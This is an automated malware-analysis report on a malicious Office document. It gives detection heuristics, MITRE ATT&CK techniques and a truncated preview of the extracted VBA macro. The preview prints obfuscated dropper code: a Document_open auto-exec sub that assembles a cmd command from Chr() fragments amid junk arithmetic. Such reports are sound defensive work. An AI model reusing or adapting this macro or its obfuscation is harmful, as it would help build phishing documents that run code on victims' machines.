MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a malicious VBA macro, specifically a Document_open macro that utilizes the Shell() function to execute arbitrary code. This indicates a macro-based attack designed to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Dbor-6615926-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dbor-6615926-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35985 bytes |
SHA-256: f7bfe0d191f4ecae78b4aa99807106781055980802ba53eda7cf4bb4de16c53b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zVtbHGBBuwQzuP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SojsjdivQGKP()
jGhhW = 22767 / 3786 - 83672 * AzODPJ / csBaV * sYTBR / 16147 / MiYWzV * 81390 - fXHWma
sMjoUG = 39030 / 12780 - 73626 * mUzwFH / lAipAm * oFDFzf / 25400 / TYdBPH * 33906 - RhYZBQ
bwLpi = 58861 / 12762 - 41299 * QRBzcp / zVERaF * iEEBK / 19654 / wRvKrw * 22481 - vwzmP
iPVTD = 51948 / 44188 - 12263 * dLBTa / IuLsfR * QWNvv / 72410 / lnKPn * 72153 - EoONSX
QulDnu = 59400 / 45420 - 65515 * tUoEQ / lZzXp * SwXpZ / 51206 / HAqlk * 99620 - zaiDG
jAmKu = 70116 / 65283 - 4859 * jVucla / wLsTAF * lqUzZI / 34375 / pdOUDO * 208 - HOOSi
End Function
Private Sub Document_open()
On Error Resume Next
OAcJcz = 12920 - CtZaTA * UsJwh / Dqmfq * sUiWf * 23970 + rMHNu * WziGiP - 60014 * 45646 - (isLkm + 29845 + Jpimn * WYWtN)
BfjlKw = 76812 - dEwwH * DsKzPN / XiZZQO * CqcfTf * 5128 + vYZqOR * wUQnhY - 5255 * 58956 - (VBqdw + 12201 + ujpEm * Qccwaw)
ZwTnmF = 15999 - jZAMCK * pYfpM / GYMwTD * LkzGsz * 92135 + WqKAE * DPEaZ - 11773 * 19912 - (XvGauT + 50918 + oSCTR * ctTDOO)
sZKOdRvmJqX = Application.Run("FqLHmmC", "" + NfPDKUVk + KmjqmLvZz + CVar("c") + RiHEHcK + CZOBQNvjbvpZl + bMttTl + uVizaDMhJZ + aAPibnzRN + qjrRzqij + vPPrPHzEtf + EUjFaQrI + vISjvwwh + cVfqXs + XoBEowKJ + RrsYvAj + NpisSisW + qnCaq + ljiPJQowt + zOOXN + RTVzQW + pHNDIIYuzi + CzSEccOBs)
AHnKGW = 83811 - TpaRSh * RzQXF / siZuBw * mEjcrX * 25110 + UzRYFi * XchzX - 24616 * 20585 - (kUsvI + 46371 + QEXFJ * JzavU)
BzzzGn = 22011 - MCbZbo * HwbEYG / MAAZoO * GEDtNN * 72007 + toUMQ * Cwjhb - 26166 * 80888 - (TPvpUm + 98639 + jwzTFz * fNaKn)
End Sub
Function LqdKETrNAoik()
zZBOX = 91371 - EHcHp * HKWmH / tEKjMZ * GPnzDd * 36540 + bfiDw * MMwtWp - 53454 * 17307 - (nJcuSO + 73905 + oovovQ * ZiWjf)
XtwVuH = 40876 - zzEYA * ADCYj / jzqcvf * lwfbNj * 65525 + hLRJfP * tjFfSX - 25481 * 94608 - (GEJNYC + 43588 + OSkSRV * pSdSsk)
muziv = 29206 - ALnbo * fsTiS / CDPQT * fPCEbI * 30522 + PGrFL * PzvnI - 58558 * 83158 - (FfSUX + 43641 + EWifj * zKvjf)
jLIhsN = 79458 - jzzZAq * iAKooq / AnQvo * sTsdL * 90491 + QmlWY * wEvrV - 31236 * 34265 - (vVZrpC + 39477 + UQwZV * QHUOFQ)
uwnoht = 20212 - KDJib * hGBHY / LPorq * niiYiX * 54090 + ENzOMZ * QAbqiw - 24065 * 80255 - (smEtS + 58687 + wwvFj * lYlCqw)
OnFKX = 30076 - RXztV * ZURfo / vMfdbK * qztuF * 770 + CvaSrz * BBMTY - 1736 * 66700 - (wMnDt + 37011 + jKiAJZ * Xdutd)
End Function
Function nQnrKEwvf()
RSOPH = 96742 - MSzqVR * jnwii / jkvBYp * pAIIaD * 17400 + LZNhw * JXdNlX - 60905 * 8003 - (LoXqk + 62919 + MrRDG * KqPSI)
wzTlV = 86452 - GRUZz * AooWHK / ozGla * KKFYV * 33057 + zASoi * MLEiuO - 33297 * 14539 - (VQZnUV + 64858 + rhLTiu * szIwh)
GZatw = 84877 - FaWiwB * lllOSs / TvlvZV * bWOqtN * 52385 + SfYCbZ * fizdJ - 35004 * 53648 - (tZWind + 78230 + ZWqdDH * CnIJTF)
IZBTZ = 90627 - VzPKrs * uFKtGW / jCGQu * tNFlR * 75711 + KlNvXz * uqEOpp - 78135 * 44373 - (IjiBtY + 44544 + CifCIu * sENRIs)
AoOwp = 69355 - LXJuT * ozhwhR / bGXYi * DmuFU * 51054 + AQlZWf * djKBZO - 11730 * 22687 - (SLPPwu + 87613 + pTZji * RoTdo)
End Function
Attribute VB_Name = "kzjWWNRom"
Function bMttTl()
On Error Resume Next
JtkCl = 19313 * 80246 - 52352 + hmSSRA * fjvqzo * 58377
fYjEbEPn = CStr(Chr(MUPEDaVanoM + nsKwYcJwcsr + 109 + KrINhFiKol + ELQcjHmD)) + "d /" + CStr(Chr(pBbYXAdkbX + QiSaGGdTzGj + 99 + QsUtlFiLmB + JhhjEKCpXvmK)) + " ^f^O" + "^r ;" + " " + "; " + "/^F , " + "; "
oDLQzH = 2561 + nMvisO * ujlszh / tmHwSd + UPZMHV / PdjfRW / ovzohJ - FsSsw * 83005 * ZJBoY - 42579 * zWWls + 90978 - GBNjLT
VvDGQwj = " " + CStr(Chr(farYjRm + HJqqSjUi + 34 + nzYwnuwj + VGJklaIUNSpzFb)) + " t" + "oke" + "ns= " + " 2 " + "d" + "eli" + CStr(Chr(OUkFDRKzVC + EinknHlBzGF + 109 + AQJVnrzWQfc + tEvKOiUdQifEM)) + "s" + "=EFH" + "MN" + CStr(Chr(YWIOsiDAAdhLI + wKouNhGpr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.